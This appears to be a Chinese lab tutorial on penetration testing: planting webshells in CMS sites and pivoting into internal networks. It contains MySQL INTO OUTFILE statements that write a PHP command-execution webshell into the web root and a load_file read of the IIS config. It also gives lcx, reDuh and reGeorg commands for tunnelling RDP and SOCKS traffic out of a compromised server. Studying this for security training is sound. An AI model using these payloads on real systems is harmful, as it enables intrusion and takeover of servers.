15. 获取webshell和内网渗透、开启3389端口

获取webshell的方法：
1.cms获取webshell（百度）
2.非cms获取webshell

 1.数据库备份
 2.抓包上传
 3.sql命令 
 4.模板修改
 5.插入一句话 
 6.修改上传类型(编辑器漏洞)

3.其他获取webshell方法

1.tomcat获取
2.weblogic获取
3.jboss获取

内网渗透使用的工具：lcx.exe(有公网地址的情况使用);reDuh(内网到内网，没有公网地P址)、使用reGeorgSocksProxy.py和Proxifie软件(使用的是socker5代理)【内网到内网到内网】

1.2 非cms获取webshell的方法

1.2.1 数据库备份

以良精 通用企业网站管理系统 试用版为例。

(1).登陆后台之后找到一个具有文件上传功能的模块，上传一个一句话木马图片，会生成一个上传路径。

image.png

(2).在找到数据库备份的模块，将数据库备份地址改为刚才文件上传的成功后返回的路径，即将一句话木马图片备份。

image.png

3.使用菜刀工具进行连接。获取webshell.

image.png

1.2.2 插入一句话木马获取webshell

1.找到文本框能输入的地方，在进行测试，看是否能插入一句话木马。

image.png

2.在插入一句话木马之后进行保存，看保存的文件中是否插入了一句话木马。

image.png

image.png

3.确保插入之后，使用菜刀进行连接。

image.png

1.2.3 sql命令获取webshell

1.安装dedecms，前提条件是safe_mode是不勾选状态

image.png

image.png

image.png

安装成功之后需要将php切回最低版本.

2.进入phpmyadmin，创建一个表，插入木马，输出到网站根路径，在使用菜刀进行连接。

第一种
CREATE TABLE `mysql`.`best` (`best1` TEXT NOT NULL );
INSERT INTO `mysql`.`best` (`best1` ) VALUES ('');
SELECT `best1` FROM `best` INTO OUTFILE ‘D:\\phpStudy\\WWW\\best111111.php’;
DROP TABLE IF EXISTS `best`;

第二种方法
Create TABLE oldboy (best text NOT NULL);
Insert INTO oldboy (best) VALUES('');
select best from oldboy into outfile 'C:\\php\\htdocs\\best111111.php';
Drop TABLE IF EXISTS oldboy;

第三种方法：
select '' INTO OUTFILE 'C:\\php\\htdocs\\best111111.php';

也可以这样
select '\';system($_GET[\'cmd\']); echo \'

\'; ?>' INTO OUTFILE 'C:/php/htdocs/best111111.php'

image.png

二、读取文件内容
select load_file(‘c://windows//system32//inetsrv//MetaBase.xml
');
c:/windows/system32/inetsrv/MetaBase.xml
是iis的配置文件，包含所有网站的配置路径，ip端口等。

使用这种方法输出时需要设置：

image.png

2 内网渗透

2.1 开启3389端口

1.通过修改注册表开启远程终端，详情请看： http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html

2.通过3389工具开启远程连接。

如何判断端口是否开放：
没有改端口的情况下可以用
使用命令：
netstat -ano
tasklist /svc

改3389端口可以使用大马查看改变之后的端口号。

2.2 服务器处于内网如何远程连接

2.2.1 使用icx工具解决内网远程连接

有公网的情况下：
1.Webshell上执行：lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389 （将本机3389端口流量转发到公网ip的2222端口上去）

image.png

2. 自己的电脑里面执行：lcx.exe -listen 2222 4444 （监听本地的2222端口将流量转发到4444 ）

   
   
   image.png
   
   
   image.png

2.2.2 通过端口转发脚本解决内网远程连接

如果两台机器都处于内网的情况下，没有公网地址的情况下，可以使用以下方法：
1.通过上传一句话木马到网站，在使用菜刀链接，上传reDuh.php文件。
2.在物理机上打开reDuh的客户端，输入url。修改映射的端口号。

image.png

2.2.3 内网渗透（内到内到内渗透）

攻击机属于内网攻击的服务器也属于内网，在渗透其他的主机也属于内网。

本次实验需要三台机器，
win2003需要设置两张网卡，192.168.60网段和172.16.0网段。
win2007设置为172.16.0网段。
win2010(物理机)设置为192.168.60网段。
本次实验的目的是物理机可以访问172.16.0网段

1.设置ip,win2003 172.16.0.4
win 2007设置为172.16.0.6
2.使用菜刀上传文件tunnel.nosocket.php到2003系统。并进行访问。

image.png

3.在物理机运行reGeorgSocksProxy.py脚本。并使用命令：reGeorgSocksProxy.py -p 9999 -u http://192.168.60.102:200/tunnel.nosocket.php

image.png

使用这个链接的方法解决：
https://blog.csdn.net/qq_36196621/article/details/89918601

脚本安装成功:

image.png

4.在物理机安装Proxifier。并进行设置。
设置代理服务器：

image.png

设置代理规则：

image.png

设置好之后访问172.16.0网段，访问成功。

image.png

brupsute如果被加入黑名单的话，是抓取不到数据的。可以使用socker5代理。